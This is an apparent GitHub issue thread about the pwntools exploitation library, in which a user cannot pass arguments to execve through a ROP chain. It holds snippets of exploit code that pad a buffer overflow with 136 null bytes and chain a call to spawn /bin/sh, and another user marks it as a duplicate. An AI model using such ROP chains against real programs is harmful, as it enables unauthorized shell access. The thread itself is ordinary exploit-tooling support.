Open rommarius opened 1 month ago
cant spawn a shell with arguments
rop = ROP(program, base=0x00007fffffffe400) rop.call('execve', [b'/bin/sh', [[b'/bin/sh'], [b'-p'], [b'-c'], [b'ls']], 0]) chain_1 = b'' chain_1 += b'\x00'*136 # chain_1 += b'B'*6 chain_1 += rop.chain() print(rop.dump())
with null terminated array also didn't work
rop.call('execve', [b'/bin/sh', [[b'/bin/sh'], [b'-p'], [b'-c'], [b'ls'], 0], 0])
this seems to work but complex parameters didn't
rop = ROP(program) rop.execve(bin_sh, 0, 0) chain_1 = b'' chain_1 += b'\x00'*136 # chain_1 += b'B'*6 chain_1 += rop.chain()
This appears to be a duplicate of #2409
cant spawn a shell with arguments
with null terminated array also didn't work
this seems to work but complex parameters didn't